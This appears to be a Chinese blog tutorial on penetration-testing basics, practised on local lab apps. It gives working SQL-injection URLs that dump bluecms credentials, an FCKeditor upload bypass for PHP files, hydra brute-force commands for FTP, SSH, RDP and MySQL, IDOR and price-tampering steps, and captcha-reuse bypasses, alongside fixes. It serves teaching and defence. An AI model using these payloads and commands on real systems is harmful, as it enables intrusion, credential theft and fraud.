当前位置: 首页 > article >正文

【网络安全的神秘世界】渗透测试基础

在这里插入图片描述

🌝博客主页:泥菩萨

💖专栏:Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具

渗透测试基础

基于功能去进行漏洞挖掘

1、编辑器漏洞

1.1 编辑器漏洞介绍

一般企业搭建网站可能采用了通用模板(CMS,内容管理系统),这些现成的CMS后台如果需要发文章,可能会用到编辑器,这些编辑器是有专门的团队运营开发的,编辑器有可能存在漏洞。只要使用了存在漏洞的编辑器,那么网站就会存在相应的漏洞

编辑器漏洞通常有如下利用方式:

1、编辑器配合解析漏洞进行利用

2、编辑器自身的漏洞利用

FCKeditor

FCKeditor编辑器的漏洞源码

获取版本号

/FCKeditor/_whatsnew.html
/Fckeditor/editor/dialog/fck_about.html

常见的测试上传地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/editor/filemanager/browser/default/browser.html

常见的示例上传地址:

FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html

可能存在的其他上传点:

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectos/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors
/jsp/connector.jsp

browser.html文件:

FCKeditor/editor/filemanager/browser/default/browser.html?
type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/php/connector.php

1.2 编辑器漏洞攻击还原

挖掘编辑器漏洞的思路:

1、通过目录扫描,爬虫识别编辑器

2、寻找编辑器版本对应的漏洞

3、利用该编辑器漏洞

Fckeditor编辑器漏洞攻击还原:

首先搭建环境:windows 11 + phpstudy_64 (php 5.4.45)

在这里插入图片描述

在这里插入图片描述

把FCKeditor编辑器的漏洞源码放在根目录

在这里插入图片描述

访问http://your_ip/FCKeditor,有403报错是正常的

在这里插入图片描述

目录扫描发现目标网站存在FCKeditor:

在这里插入图片描述

当确定一个网站使用了FCKeditor编辑器后,可以进行信息收集

查看版本:

http://10.0.0.172/Fckeditor/editor/dialog/fck_about.html

在这里插入图片描述

判断出该FCKeditor编辑器版本为:2.4.3

利用示例页面进行上传

http://10.0.0.172/FCKeditor/editor/fckeditor.html

在这里插入图片描述

点击插入/编辑图像,点击链接,Browse Server

在这里插入图片描述

会打开新的页面,发现有报错提示

在这里插入图片描述

观察url发现,我们使用的是php而路径是asp,进行修改

http://10.0.0.172/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

这次仍然报错,但是报错信息不同了

在这里插入图片描述

访问D:\phpstudy_pro\WWW\FCKeditor\editor\filemanager\browser\default\connectors\php\config.php,修改配置如下并保存:

上传路径:D:\phpstudy_pro\WWW\FCKeditor\editor\filemanager\browser\default\images

在这里插入图片描述

重启完成后,再次访问链接,可以正常访问

在这里插入图片描述

上传PHP文件,抓包,修改php后缀,增加空格

在这里插入图片描述

在这里插入图片描述

上传成功后,根据前面的配置文件可以构造出路径:

http://10.0.0.172/FCKeditor\editor\filemanager\browser\default\images\file/phpinfo.php

在这里插入图片描述

也可以用蚁剑直接拿下这台web服务器

此外,关于该实验环境,也可以通过测试页面进行文件上传:

http://10.0.0.172/FCKeditor/editor/filemanager/browser/default/connectors/test.html

在这里插入图片描述

也可以使用FCK综合利用工具进行利用

在这里插入图片描述

2、旁站&跨库

旁站:同一个web服务器上存载着多个web站点,通过不同端口对外进行服务

2.1 旁站&跨库

漏洞环境搭建

bluecms v1.6 sp1源码
windows 7
phpstudy(php 5.4.45)

将bluecms源码放入phpstudy网站根目录中

在这里插入图片描述

之后访问http://your_ip/bluecms/uploads/install进行安装

在这里插入图片描述

填写数据库账号密码,我设置的是root/123456,数据表前缀blue_,管理员账号密码admin/123456,下一步

在这里插入图片描述

在这里插入图片描述

返回空白页面即代表安装成功

在这里插入图片描述

旁站和跨裤演示

在渗透测试过程中,如果正面难以突破,那么就可以采用一些迂回战术,从侧面来发起攻击,也就是采用一些间接攻击方法,例如旁站,通过旁站注入来进行渗透

在这里插入图片描述

假如在某次渗透测试过程中我们发现主站难以攻破,又发现存在旁站bluecms,于是通过旁站来进行攻击:

http://10.0.0.160/bluecms/uploads/

分析这个页面可以挖的地方:

1、收藏----存在ssrf

2、密码爆破

3、弱口令

4、密码明文传输—有攻击者监听流量可以看到密码

5、是否记住我—可能用了share框架

在这里插入图片描述

点击进入注册功能点,思考可能存在以下漏洞:

1、弱口令

2、账号枚举—判断是否存在账号

3、测试验证码是否有效(不填或者故意填错)

4、csrf—此网站在验证码无效的情况下

5、逻辑漏洞------当作修改已注册用户密码功能点(在不校验旧密码的情况下,根据账户枚举得到一个已有账号,抓包绕过前端限制,把账户修改为已经存在的,并设置新密码)

6、XSS(盲注的场景)

7、电子邮箱—邮箱轰炸

在这里插入图片描述

点击进入留言建议,分析这个页面可以挖的地方:

1、XSS

在这里插入图片描述

回到首页进行渗透测试,输入admin密码随意,根据提示发现admin是系统用户组,并且存在后台

在这里插入图片描述

找后台的3种方法:

1、已知框架了直接上网查

2、猜(console、login、admin、manage、system)

3、目录爆破:dirsearch、御剑

通过御剑扫描,找到了网站后台管理地址

在这里插入图片描述

# 登录
http://192.168.190.128/bluecms/uploads/admin/login.php?act=login

在这里插入图片描述

已知账号admin,爆破出密码为123456

在这里插入图片描述

输入admin/123456成功进入后台

打开发布本地新闻,分析这个页面可以挖的地方:

1、xss

2、文件上传

3、编辑器漏洞

4、sql注入

在这里插入图片描述

删除功能,分析可能存在的漏洞:

1、越权:普通用户实现删除操作

2、未授权访问:在不登陆的情况下删除

在这里插入图片描述

抓包,找到删除功能的接口,拼接删除功能的接口地址

192.168.75.131/bluecms/uploads/admin/ann.php?act=del_cat&id=1

在这里插入图片描述

添加广告后,有xss弹窗

在这里插入图片描述

在这里插入图片描述

发现 “获取JS” 的功能,给我们一串js代码

在这里插入图片描述

在这里插入图片描述

思考:JS从哪里获取到的,会有什么漏洞?

1、本地获取-----任意文件读取

2、数据库获取—SQL漏洞

3、远程服务器获取—RCE、SSRF(内网)、文件包含(外网)

访问上述url,发现是个空白页面,观察url可能存在sql注入漏洞

192.168.75.131/bluecms/uploads/ad_js.php?ad_id=1

验证是否存在sql注入漏洞

在这里插入图片描述

通过order by 判断有多少列,输到8报错,证明是7列

在这里插入图片描述

使用联合注入,用1,2,3,4,5,6,7表示无意义位,只是想看看哪个位置会有回显

在这里插入图片描述

发现页面不返回消息,查看网页源代码

在这里插入图片描述

证明前端显示位不够,让union all左边ad_id=-1查不出东西,就会让出显示位给右边

在这里插入图片描述

发现第7列有回显,可以在此处写入想执行的sql语句

注入出数据库名为bluecms

在这里插入图片描述

继续注入blue_user表中的字段名,发现报错,存在过滤,单引号前面出现\证明单引号被转义:

view-source:http://192.168.190.128/bluecms/uploads/ad_js.php?ad_id=-
1 union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_user'

在这里插入图片描述

使用16进制进行绕过:

view-source:http://192.168.190.128/bluecms/uploads/ad_js.php?ad_id=-
1 union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f75736572

在这里插入图片描述

继续注入bluecms库中blue_user表的user_name和pwd字段内容:

view
-
source:http://192.168.190.128/bluecms/uploads/ad_js.php?ad_id=
-1 union select 1,2,3,4,5,6, concat(user_name,pwd) from blue_user

也可以使用concat_ws在user_name和pwd中间加入0x7e作为分隔符,方便我们分隔账号密码

在这里插入图片描述

admin以及21232f297a57a5a743894a0e4a801fc3,即web管理员的账户密码

通过在线解密:发现明文密码为admin

在这里插入图片描述

利用SQL注入能够跨越当前库,获取所有的数据库中的数据库名,表名,字段名:

view
-source:http://192.168.190.128/bluecms/uploads/ad_js.php?ad_id=
-1 union select 1,2,3,4,5,6,group_concat(schema_name)
from information_schema.schemata

在这里插入图片描述

2.2 CDN绕过

旁站攻击的前提是知道网站服务器的真实IP,确保要攻击的多个目标站点部署在同一服务器上

CDN概述

CDN也叫内容分发网络,CDN的主要目的是通过将内容缓存到离用户更近的服务器上,来提高用户访问网站或应用程序的速度和可靠性

检测网站是否采用了CDN

1️⃣利用多地ping

每个地区得到的IP地址都不一样则说明可能存在CDN,可以使用以下网站进行检测:

https://wepcc.com
http://ping.chinaz.com
https://mping.chinaz.com/
http://ping.aizhan.com/
http://tcping8.com/ping/

在这里插入图片描述

2️⃣利用nslookup

如果返回域名解析对应多个IP地址多半是使用了CDN

在这里插入图片描述

查找真实IP方法

1️⃣查找历史DNS记录

一个网站建设之初的时候,规模不大可能早期没有使用CDN

DNS查询https://www.malapan.com/dnshistory/safepub.com、https://www.
racent.com/dns-check
微步在线:https://x.threatbook.cn/
在线域名信息查询:http://toolbar.netcraft.com/site_report?url=
DNS、IP等查询:http://viewdns.info/
CDN查询IP:https://tools.ipip.net/cdn.php

这些网站具有随机性,不一定能查到

2️⃣子域名查询

对于一个网站边缘业务可能没有上CDN,此时就可以通过查询子站点所对应的IP来辅助查找网站的真实IP

第三方接口:
https://x.threatbook.cn/
https://dnsdb.io/zh-cn/
https://site.ip138.com/

google语法:Google site:baidu.com

子域名扫描器:subdomainbrute、amass、OneForAll子域名挖掘机等等

3️⃣网络空间测绘

shadan:https://www.shodan.io/
fofa:https://fofa.info/
hunter:https://hunter.qianxin.com/
zoomeye:https://WWW.zoomeye.org/

4️⃣利用网站漏洞

phpinfo之类的探针、GitHub信息泄露等、
XSS盲打、命令执行反弹shell,SSRF等

5️⃣利用邮件服务器找到真实IP

在注册等一些需要发送邮件的地方让服务器给自己发送邮件,然后查看邮件服务器的IP地址。这种情况比较适用于小站,因为很多大型企业的邮件服务器都是独立的,不太会和业务站点放在同一服务器上。

6️⃣通过分析目标C段来判断真实IP

3、越权

3.1 越权漏洞原理介绍

越权访问是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大、常常被列为OWASP TOP 1 ------ 属于逻辑漏洞

该漏洞是指应用在检查授权时存在纰漏,使得攻击者在登录低权限账户后,利用一些方式绕过权限检查,访问或者操作其它用户信息及获取更高权限

由于越权漏洞往往很难通过工具进行自动化检测,因此在实际应用中危害很大

对比一下SQL注入漏洞和越权漏洞的测试过程:

1、越权漏洞:找到获取数据的接口,准备两个不同权限的账号A和B,控制A通过指定的接口去访问B的数据;访问到即越权

2、SQL注入怎么测:参数级漏洞,看到有携带参数的接口就可以放在sqlmap里去跑,sqlmap自动进行替换完成测试

水平越权: 相同权限下不同的用户可以互相访问

垂直越权: 使用权限低的用户可以访问到权限高的用户

水平越权测试方法:

垂直越权测试方法:

3.2 水平越权攻防还原

火狐浏览器:登录lucy/123456,点击查看个人信息

在这里插入图片描述

抓包,修改请求数据包的username参数为lili

在这里插入图片描述

在火狐浏览器可以查看到lili的个人信息了

在这里插入图片描述

3.3 垂直越权攻防还原

火狐浏览器登录:admin/123456

在这里插入图片描述

抓包,发现除了cookie没有其它参数了,只能根据cookie值来判断当前用户的身份

在这里插入图片描述

在admin账户中点击添加用户,来到这个页面

在这里插入图片描述

1️⃣复制上述url用谷歌浏览器打开

2️⃣替换cookie

还有一种方法,在admin用户下创建内容

在这里插入图片描述

抓包,发现除了cookie没有其它校验身份的参数了

在这里插入图片描述

把cookie值修改为pikachu用户的cookie值

在这里插入图片描述

如果成功,相当于用pikachu的权限进行添加用户;放包查看,添加成功了

在这里插入图片描述

谷歌浏览器登录:pikachu/000000

在这里插入图片描述

对于pikachu账户来说没有添加用户的功能,但是可以用谷歌再打开一个新的标签页,表示以pikachu的身份访问这个url

在这里插入图片描述

设置一些内容进行创建,看能否真的进行操作做

在这里插入图片描述

做了校验,发现不是admin用户,直接退出了

在这里插入图片描述

但是来到admin用户查看后台,信息已经添加成功了

在这里插入图片描述

3.4 越权漏洞修复

1、前后端同时对用户输入信息进行校验,双重验证机制

2、执行关键操作前必须验证用户身份,验证用户是否具备操作数据的权限

3、特别名的操作可以让用户再次输入密码或加入其它的验证信息,防止CSRF攻击

4、可以从用户的加密认证cookie中获取当前用户的id防止攻击者对其修改,或在session、cookie中加入不可预测的user信息

5、对想要引用的资源ID进行加密,防止攻击者枚举ID,敏感数据特殊化除了

6、用于不要相信来自用户的输入,对于可控参数进行严格的检查与过滤

4、 逻辑漏洞

4.1 逻辑漏洞概述

由于程序逻辑输入管控不严,导致程序不能正常处理或处理错误,进而产生的漏洞。一般出现在登录、注册、密码找回、信息查看、交易支付金额等位置,由于逻辑漏洞产生的流量多数为合法流量,一般的防护手段或设备无法阻止,也导致了逻辑漏洞成为企业防护中的难题

4.2 如何挖掘逻辑漏洞

4.2.1 注册处

注册功能可能出现任意用户注册、短信轰炸等问题

【任意用户注册】:有时候不核实用户填写的邮箱和手机号是否有效,从而达到任意注册的效果

【短信轰炸】:没有对获取短信验证的次数进行校验的话,就可以不停的发送短信,会消耗服务器的资源和金钱

前端验证:判断是否有任意用户注册漏洞

手机验证码:短信轰炸、验证码是否可以暴力破解,验证码与手机号有没有校验匹配(随便拿到一个验证码也能登录其他账号)

账号密码注册:是否可以批量注册(涉及黑产)

4.2.2 登陆处

登陆处可能存在任意用户登录、短信轰炸等问题

前端验证:判断是否有任意用户登录,是否有验证码回显,是否可以修改返回包造成任意用户登陆等问题

手机验证码:验证码是否可以暴力破解、验证码与当前手机号有没有校验匹配

账户密码登录:没有验证码、验证码失效、验证码可以重复利用或者验证码绕过等情况,可以进行暴力破解

4.2.3 密码找回处

1、前端验证绕过:先获取手机验证码,在输入要修改的邮箱或密码,抓包修改用户名

2、验证码是否可以多次使用

3、验证码是否直接返回在数据包中

4、验证码未绑定用户:明明是A的验证码能给B用

5、修改接收的手机或邮箱进行密码重置

6、验证步骤绕过:类似1

7、未校验用户字段的值:比如user_id可替换

4.2.4 支付与越权

1、提交订单或者结算时对金额等参数进行修改(可能只校验总价=单价*数量)

2、提交订单时修改商品数量

3、修改支付接口等:某个付款二维码被攻击者拿到了,为了防止攻击者使用该二维码进行随意支付,所以要进行一次校验

4.3 交易支付中的逻辑问题

支付漏洞的理解通常都是篡改价格

4.3.1 支付逻辑漏洞的呈现形式

1、充值的时候,程序只判断订单有没有充值成功,但没有判断金额

例如:生成订单跳转到支付宝页面,在原网站点支付失败,这时可以修改订单,改成更小的金额(订单号没变),回到支付宝页面进行支付操作,支付成功。程序并没有重新核对支付宝实际的金额,只是把订单改为已支付

2、使用余额支付,把数量改为负数,总金额也为负数,扣除余额时,负负得正,这时余额增加

3、支付逻辑漏洞的几种常见类型:

(1)修改金额

(2)修改商品数量

(3)修改优惠金额

(4)修改数量、单价、优惠价格参数为负数、小数、无限大(超过内存能承载的最大值,整数溢出后变成负数)

(5)商品价格更改

(6)支付key泄露等

4.3.2 支付漏洞案例

漏洞环境:webug

使用docker安装

docker pull area39/webug
docker run -d -p 8082:80 -p 33060:3306 area39/webug

安装成功后访问http://your_ip:8082/control/login.php

默认账户:admin/admin
数据库账号:root/toor

在这里插入图片描述

打开支付漏洞靶场

在这里插入图片描述

进入某网站商城页面

http://10.0.0.158:8082/control/auth_cross/cross_permission_pay.php

在这里插入图片描述

点击立即购买,发现弹窗花费了100元购买商品

在这里插入图片描述

观察url发现,price是价格的意思,尝试修改值为1

在这里插入图片描述

也可以抓包进行修改商品的价格

在这里插入图片描述

在这里插入图片描述

4.4 密码修改逻辑漏洞

在这里插入图片描述

访问“越权修改密码”靶场:

在这里插入图片描述

进入docker的数据库中

docker exec -it id bash
mysql -uroot -p //密码toor

在这里插入图片描述

查看用户密码信息

show database;
user webug;
show tables;
select * from user_test;

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

登录admin/admin账号

在这里插入图片描述

在这里插入图片描述

显示not found,这是网站本身的问题,删除pt_env/即可

在这里插入图片描述

登录aaaaa/asdfsadf账号

在这里插入图片描述

思考可能存在的漏洞:

1、明文传输

2、弱口令

3、SQL注入

4、越权修改其他用户密码

5、旧密码是否有效

对aaaaa账户进行修改密码的操作:发现修改密码处未对旧密码进行验证,旧密码处输入任意内容,可以直接修改密码

在这里插入图片描述

查看webug库下的user_test表

use webug;
select * from user_test;

在这里插入图片描述

抓包,观察数据包我们发现id值可以被篡改,一般来说管理员的id值一般为1或者0

在这里插入图片描述

将id修改为1进行尝试,发现修改成功

在这里插入图片描述

查看webug库下的user_test表

use webug;
select * from user_test;

在这里插入图片描述

此时admin账户的密码已经被更改为:123456,通过低权限的账户修改了管理员账户的密码,使用admin/123456即可成功登录。

4.5 实战项目逻辑漏洞分享

4.5.1 验证码回传导致任意用户注册

由于程序逻辑校验不严,导致验证码直接显示在响应包中,造成任意用户注册

在这里插入图片描述

1、可以修改请求包手机号

2、可以在响应码里直接看到验证码拿去使用

4.5.2 任意用户登录

用户注册成功后,第一次会直接以注册用户的身份登录,而无需用户输入账号密码登录,查找数据包中是否有用户的参数username、userid等进行替换

在这里插入图片描述

截取并查看响应数据包,发现系统是通过userid、username等参数进行身份验证及登录:

在这里插入图片描述

再去截取请求数据包,修改userid值,成功登录他人用户:

在这里插入图片描述

4.5.3 任意密码重置

在密码修改页面,随意输入旧密码,输入新密码以及确认新密码,点击修改密码,截取数据包

将响应包由false改为true,有时候响应状态码不一定是true或false,也有可能是0和1

在这里插入图片描述

在这里插入图片描述

4.6 逻辑漏洞修复

1、正确配置用户的权限信息,不要仅使用简单的cookie或session去进行校验

2、对同一手机号进行识别,一定时间内不允许重复发送验证短信请求

3、加入用户身份认证机制或者token验证,防止可直接通过链接访问到的功能模块被用户恶意操作(未授权访问漏洞)

4、删除特权码,不要仅仅对code等返回值进行校验

5、订单类数据包在后端检查订单的每一个值,包括支付状态、MD5加密&解密、数字签名及验证,能够有效避免数据修改、重放攻击中的各种问题

6、避免仅使用前端校验,应在前后端同时设置校验机制,严格校验用户的数据

5、暴力破解

暴力破解是一种针对密码的破译方法,将密码进行逐个推算知道找出正确的密码为止

5.1 C/S架构暴力破解

常用于网络协议、系统、数据库、第三方应用密码的破解:

暴力破解FTP、SSH、SMB、Sqlserver、Mysql、Redis等

5.2 B/S架构暴力破解

B/S架构即浏览器/服务器结构,暴力破解:

上面 2.1 旁站&跨库 中已经讲过暴力破解bluecms的账号密码,这里不再讲述

5.3 hydra的安装与使用

hydra(九头蛇)是一个网络账号破解攻击

5.3.1 hydra的安装

kali linux下自带

5.3.2 hydra的使用

hydra常用参数:

-l            指定一个用户名
-L            指定一个用户字典
-P			  指定一个密码字典
-s			  指定端口
-vV			  显示每次的尝试信息
-f			  遇到正确的密码,停止爆破
-o            将结果输出到文件中
-M            指定一个服务器列表
-t            Tasks同时运行的线程数,默认为16
-e nsr        n:尝试空密码  s:将用户名作为密码  r:将用户名方向

使用hydra暴力破解ftp服务:

在windows使用phpstudy开启ftp

设置账号为ftp/123456并启动ftp服务

在这里插入图片描述

启动,需要手动启动一下ftp

在这里插入图片描述

确保linux和weindows两台主机之间的网络是互通的

windows:10.0.0.160
linux:10.0.0.158

在这里插入图片描述

在这里插入图片描述

hydra ip 服务 -l 用户名 -P 字典
hydra 10.0.0.160 ftp -l ftp -P pwd.txt -vV -f -e ns

将字典pwd.txt,放在当前目录下

在这里插入图片描述

成功破解出密码为:ftp/123456

在这里插入图片描述

物理机利用该密码成功登录ftp服务器

ftp://10.0.0.160/

在这里插入图片描述

在这里插入图片描述

使用hydra暴力破解ssh服务:

windows:10.0.0.167
linux:10.0.0.158

首先在Windows系统中安装openssh,以Win 11为例:

在这里插入图片描述

安装完成后,看到C盘目录下已经存在OpenSSH文件夹,接下来配置环境变量:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

配置完成后,在命令行输入sssh,出现下图即代表安装成功:

在这里插入图片描述

在Win 11下默认安装openssh,账号密码默认是当前系统用户的微软账号和密码

hydra 10.0.0.167 ssh -l Administrator -P pwd.txt -o ssh.log

破解出账号密码为Administrator/ly123

在这里插入图片描述

查看输出的文件也可以发现:

破解出10.0.0.160的ssh账号密码为Administrator/ly123

在这里插入图片描述

使用hydra暴力破解rdp服务:

win 11开启远程桌面(默认开启)

在这里插入图片描述

在这里插入图片描述

hydra 10.0.0.167 rdp -l Administrator -P pwd.txt -vV -f -e ns

发现爆破出rdp的账号密码为Administrator/ly123

在这里插入图片描述

使用该账户成功登录服务器

在这里插入图片描述

在这里插入图片描述

当用物理机远程虚拟机win 11时,虚拟机就掉线了,因为同一个账号只能被一个用户所登录

在这里插入图片描述

使用hydra暴力破解mysql服务:

win11中开启mysql服务,查看账号密码:

在这里插入图片描述

在这里插入图片描述

hydra 10.0.0.167 mysql -l root -P pwd.txt 

发生了报错,意思是MySQL没有开启远程连接

在这里插入图片描述

安装数据库管理工具

在这里插入图片描述

在这里插入图片描述

设置MySQL允许远程连接:

运行 grant all privileges on *.* to root@'%' identified by 'root'; 语句

在这里插入图片描述

破解出10.0.0.167的mysql的账号密码为:root/root

在这里插入图片描述

5.4 暴力破解安全防范

1、安全的验证码

2、对验证码的有效期和次数进行限制

3、限制认证错误的提交次数,如:连续5次密码错误,锁定2小时

4、必要的情况下使用双因子认证(验证码+滑动验证码)

6、验证码安全

所用环境:pikachu

6.1 验证码安全介绍及分类

在安全领域,验证码主要分为两大类:操作验证码和身份验证码

验证码的主要作用:防止暴力破解、恶意注册、刷票、论坛灌水等脚本行为

验证码的分类:手机短信、手机语音、通用文字、加减法、非通用文字、非通用文字加背景随机加拉伸、无感知、滑动拼图、文字点选、图标点选、推理拼图、短信上行、语序点序、空间推理、语音验证等

6.2 验证码绕过(on client前端)

当未输入验证码的时候,提示“请输入验证码”:

在这里插入图片描述

当输入错误验证码的时候提示“验证码输入错误”:

在这里插入图片描述

当输入正确验证码的时候提示“用户名或者密码不存在”:

username or password is not exists~

在这里插入图片描述

经过前三步的测试,验证码基本功能完善

我们尝试截取登录处数据包,修改密码但不更改验证码并多次重放之后发现没有提示验证码错误,该验证码依然有效,说明可能存在验证码可以重复使用的情况:

在这里插入图片描述

分析验证码部分的源代码:

代码逻辑没有问题,原因在于写在前端了

完整的实现 请求 --> 响应 过程页面才会刷新,只有页面刷新才能获取新的验证码,而我们抓到了请求包,响应回不去客户端,所以验证码无法刷新,从而导致验证码可以重复利用

在这里插入图片描述

在这里插入图片描述

既然验证码无效,就可以直接暴力破解了

在这里插入图片描述

在这里插入图片描述

破解出密码为1223456

在这里插入图片描述

除了抓包,也可以通过禁用js来绕过验证码

在这里插入图片描述

删除校验验证码的功能也能绕过

在这里插入图片描述

6.2 验证码绕过(on server后端)

先对验证码的功能进行完备性的验证

不输入验证码点登录:

在这里插入图片描述

输错验证码点登录:

在这里插入图片描述

输入正确的验证码:

在这里插入图片描述

输入一个正确的验证码,抓包:发现验证码还是可以重复利用

在这里插入图片描述

为什么代码在后端,还会出现验证码重复利用这种情况呢?

在这里插入图片描述

在burp反复 send 是2和3的过程,没有走完完整的通信,问题是验证码是后端生成的,正常情况下,只要2给了服务端,服务端就应该更新验证码

所以问题还是出现在后端,查看源代码:app\vul\burteforce\bf_server.php

在这里插入图片描述

造成该验证码重复使用的原因是:验证码在验证之后没有销毁$_SESSION[‘vcode’],造成了重复使用

在这里插入图片描述

如果销毁了$_SESSION[‘vcode’],即使新的验证码没有生成,旧的验证码也不可以用了

7、社会工程学

非技术渗透手段,简单来说就是骗

8、APT攻击

APT即高级持续性威胁,是一种潜伏周期较长、隐蔽性较强的攻击模式

APT攻击常用手段:

1️⃣水坑攻击

提前分析要攻击的目标有什么规律,寻找其经常访问的网站弱点,并事先攻击该网站,等待目标来访,伺机进行攻击

2️⃣路过式下载

攻击者把木马文件植入到某个软件中,用户下载软件的同时也下载了木马

3️⃣网络钓鱼和鱼叉式网络钓鱼

钓鱼攻击

4️⃣0day漏洞

没有在市面上公布出来,掌握在极少数人手里

APT攻击方法

1️⃣恶意代码检查

通过流量抓到攻击者用的什么payload打到你的,通过payload还原攻击代码、攻击路径,做个有针对性的修复

2️⃣主机保护应用

看行为:执行了什么操作系统路径、对外传输了哪些数据

监控企业内内所有主机安全行为

3️⃣网络入侵检测

通过流量监控设备,结合一些态势感知,对整个流量进行监控

4️⃣大数据分析检测

通过全面分析海量日志数据来还原APT攻击场景


http://www.kler.cn/a/306168.html

相关文章:

  • 城市轨道交通数据可视化的应用与优势
  • 利用编程语言和脚本编写技术,实现自动化渗透测试和安全工具的开发
  • C++中的std::tuple和std::pair
  • OpenGL ES 共享上下文实现多线程渲染
  • 若依笔记(八):芋道的Docker容器化部署
  • 代码 RNN原理及手写复现
  • 【C#】添加临时环境变量
  • linux第二课(docker的安装使用)
  • 微软九月补丁星期二发现了 79 个漏洞
  • 《ImageNet Classification with Deep Convolutional Neural Networks》论文导读
  • 漫画元素检测系统源码分享
  • AutoSar AP通信的事件订阅
  • Playwright与Selenium的对比:谁是更适合你的自动化测试工具?
  • 通俗理解低秩分解
  • 【webpack4系列】设计可维护的webpack4.x+vue构建配置(终极篇)
  • (182)时序收敛--->(32)时序收敛三二
  • 如何通过网络找到自己想要的LabVIEW知识?
  • Pocketpair澄清表示《幻兽帕鲁》无意转型免费游戏
  • 儿童编程与AI辅助编程:未来教育的机遇与挑战
  • 窗口框架frame(HTML前端)
  • 福建科立讯通信 指挥调度管理平台 SQL注入漏洞
  • 【算法篇】哈希类(笔记)
  • Ubuntu 不重装系统增加交换空间大小
  • 我的IP地址经常变化对我的账号安全有影响吗?
  • 【STM32】DAC数字模拟转换
  • SSM框架学习(三、MyBatis实践:提高持久层数据处理效率)